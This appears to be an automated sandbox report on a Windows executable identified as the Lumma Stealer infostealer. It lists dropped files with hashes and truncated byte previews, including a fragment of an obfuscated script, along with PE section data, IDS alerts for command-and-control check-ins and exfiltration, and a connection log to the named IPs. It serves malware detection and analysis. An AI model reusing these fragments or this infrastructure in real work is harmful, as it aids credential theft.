                                                                                                                                                                        Preview:MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....
                                                                                                                                                                        Process:C:\Users\user\Desktop\es5qBEFupj.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):6851208
                                                                                                                                                                        Entropy (8bit):6.451509958428788
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
                                                                                                                                                                        MD5:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                        SHA1:4F1E624BCC030E44722DE26B72C8156BF57E14E8
                                                                                                                                                                        SHA-256:73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
                                                                                                                                                                        SHA-512:6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):152576
                                                                                                                                                                        Entropy (8bit):6.433958275406592
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
                                                                                                                                                                        MD5:D49F624EA007E69AFE1163955DDBA1BB
                                                                                                                                                                        SHA1:EE35A9CEAB1F6A40694B26094FDC7727658293D2
                                                                                                                                                                        SHA-256:4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
                                                                                                                                                                        SHA-512:63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25405
                                                                                                                                                                        Entropy (8bit):5.118149909201556
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                        MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                        SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                        SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                        SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):148480
                                                                                                                                                                        Entropy (8bit):6.695251861322664
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
                                                                                                                                                                        MD5:A1E25E38AD59F032B7717CC6E5E00609
                                                                                                                                                                        SHA1:F7E7D770656E25F73BE807AC53F49776810099D5
                                                                                                                                                                        SHA-256:A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
                                                                                                                                                                        SHA-512:4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):79872
                                                                                                                                                                        Entropy (8bit):7.997576222410487
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
                                                                                                                                                                        MD5:6ECD89B15DFAEE100B13F894C76F9CEE
                                                                                                                                                                        SHA1:CFF0D1262CAD22201D25B331AFD9EB882865767F
                                                                                                                                                                        SHA-256:73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
                                                                                                                                                                        SHA-512:6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.982046518570826
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:es5qBEFupj.exe
                                                                                                                                                                        File size:7'114'240 bytes
                                                                                                                                                                        MD5:25c8f6ada1179e3fcf486844e5c1ed24
                                                                                                                                                                        SHA1:286fa29c9a674651b445e465309c21c99e2d5b95
                                                                                                                                                                        SHA256:8077581cfece59ca6d8e06d5bedde9664014531a091d3c15732aeae4679dd40e
                                                                                                                                                                        SHA512:2fcd279f794a18b86d3dc26b465b256db93b8050cd1db9f36841819e87d7d652103555ce6ee08b46b7202b1fc5fd35f58dc0096c6cb3af810087eb6f82a3acd3
                                                                                                                                                                        SSDEEP:98304:nTm9oJWyCB7XYWQcuX7z5e4Eg++HLCErN68MMTMO3YS68ThO/sjsgV:n6eJ87oWBu/5QP+XrTMMn68Ts/s
                                                                                                                                                                        TLSH:C566331879914483E9CD6B37BED87F9B0331BD3C9B6E4C2D3F15098AAF52D962907A01
                                                                                                                                                                        File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x..........@... ... y...@.. ................................m...@................................
                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                        Entrypoint:0xff4000
                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                                        Time Stamp:0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp 00007F8AF1A8583Ah
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x7940550x69.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7920000x53c.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7941f80x8.idata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        0x20000x7900000x518a007de12e1a5c538c13bb323085698b20ecunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x7920000x53c0x40039924b1b0392fbe94604b5af8aa2854eFalse0.685546875data5.668315969973589IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .idata 0x7940000x20000x200a0232179652c49de360269397bdb9ecaFalse0.150390625data1.0043697745670233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        0x7960000x2b00000x200fd71d8d5051eec51c7eb290ec58f90b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        ggsvuvii0xa460000x1ac0000x1ab600d1c616a638276a222eb189b1c18b14c3False0.9946427592132202data7.953466652603566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        bfvlwstb0xbf20000x20000x400d8bed6190934618159d53cab176402e7False0.7333984375data5.887483094879372IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .taggant0xbf40000x40000x22009db8958178763e709b11d18da4cadfe8False0.06675091911764706DOS executable (COM)0.7365750852112953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_VERSION0xbf10140x244data0.4689655172413793
                                                                                                                                                                        RT_MANIFEST0xbf12580x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                        DLLImport
                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-12-28T09:34:53.034167+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749754172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:53.947129+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749754172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:53.947129+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749754172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:55.202333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749760172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:55.974849+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749760172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:55.974849+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749760172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:57.558546+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749766172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:34:59.828548+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749772172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:35:02.092410+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749778172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:35:04.435142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749784172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:35:05.322094+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749784172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:35:06.931421+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749790172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:35:10.480730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749801172.67.128.184443TCP
                                                                                                                                                                        2024-12-28T09:35:11.270675+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749801172.67.128.184443TCP
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 28, 2024 09:34:28.102749109 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:28.102799892 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:28.102929115 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:28.105586052 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:28.105598927 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:29.905766964 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:29.906523943 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:29.906557083 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:29.908051014 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:29.908143997 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:29.910109043 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:29.910180092 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:29.924802065 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:29.924830914 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:29.997685909 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:30.254554033 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:30.254759073 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:30.254812956 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:30.255753994 CET49699443192.168.2.734.226.108.155
                                                                                                                                                                        Dec 28, 2024 09:34:30.255775928 CET4434969934.226.108.155192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.204994917 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.326107979 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.326173067 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.327140093 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.446804047 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.446819067 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.446907997 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.446938992 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.446976900 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.447010994 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.447022915 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.447022915 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.447057009 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.447062016 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.447091103 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.447094917 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.447115898 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.447150946 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.447174072 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.447185993 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.447235107 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.566616058 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.566628933 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.566665888 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.566684008 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.566704035 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.566740036 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.566812992 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.566823006 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.566884041 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.614950895 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.615082026 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.731081963 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.731182098 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:43.782799959 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.894820929 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.894886017 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.094896078 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.095005035 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.338867903 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.338936090 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.340810061 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.341037035 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.341103077 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.459063053 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.459147930 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.460732937 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.460781097 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.460797071 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.460839987 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.460850954 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.460881948 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.460911036 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.460937023 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.460948944 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461008072 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461019993 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461065054 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.461138964 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461160898 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461220026 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.461249113 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461314917 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461380005 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.461381912 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461450100 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461503983 CET4972680192.168.2.7194.87.58.92
                                                                                                                                                                        Dec 28, 2024 09:34:44.461779118 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461791992 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.461822033 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.462881088 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.462898016 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.463536024 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.463570118 CET8049726194.87.58.92192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:44.463613987 CET8049726194.87.58.92192.168.2.7
